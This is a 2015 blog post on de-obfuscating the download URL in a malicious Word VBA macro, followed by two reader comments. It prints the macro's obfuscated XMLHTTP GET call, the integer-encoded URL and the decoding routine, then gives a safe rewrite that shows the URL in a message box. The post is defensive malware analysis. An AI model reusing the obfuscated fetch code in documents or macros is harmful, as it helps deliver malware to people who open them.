Tuesday, November 10, 2015

De-Obfuscate URL from Evil VBA Macro

Here's a quick run-down of how I manually de-Obfuscated a URL from Evil VBA Macro.

First I was looking at this evil VBA Macro, but it's obfuscated and difficult to determine what it's doing. After crawling the VBA for a bit I noticed this line

Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")

Which looks like it's trying to create an Activex object to browse a url. A bit later I see this code.

jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
jsonParseString.Send

Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice though the URL is obfuscated, it's just a function call Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing characters in the url).

solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)

And then I see Redistribute is a function that likely converts those integers to the actual url.

Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
  Dim n As Integer
  For n = LBound(Z) To UBound(Z)
   Redistribute = Redistribute & Chr(Z(n) - 8 * oldLen - 4444)
  Next n
End Function

Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code. Rename a few variables so it makes more sense to me. Add a MsgBox to the end of the code. Drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my url.

  Dim oldLen As Integer
  oldLen = 35
  Dim decodeURLFunction As String
  Dim encodedUrl() As Variant
  encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
  Dim n As Integer
  For n = LBound(encodedUrl) To UBound(encodedUrl)
   decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
  Next n
  MsgBox decodeURLFunction



Of course always do this in a lab, a safe environment. Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects because then evil things may happen on your lab box. Instead just ensure it's a bunch of string concatenation, character conversions, etc. and then add a safe MsgBox to pop up a message box with your info you wanted.



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at
Labels: , , ,

2 comments:

  1. ramizJuly 14, 2016 at 12:22 PM

    I would like to thank you for the efforts you have made in writing this article. I am hoping the same best work from you in the future as well. Thanks...
    visual basic course london

    ReplyDelete
  2. Dương Đình DẫnAugust 21, 2018 at 1:36 AM

    So let me ask, how to encode a word vba code? thanks

    ReplyDelete

Subscribe to: Post Comments (Atom)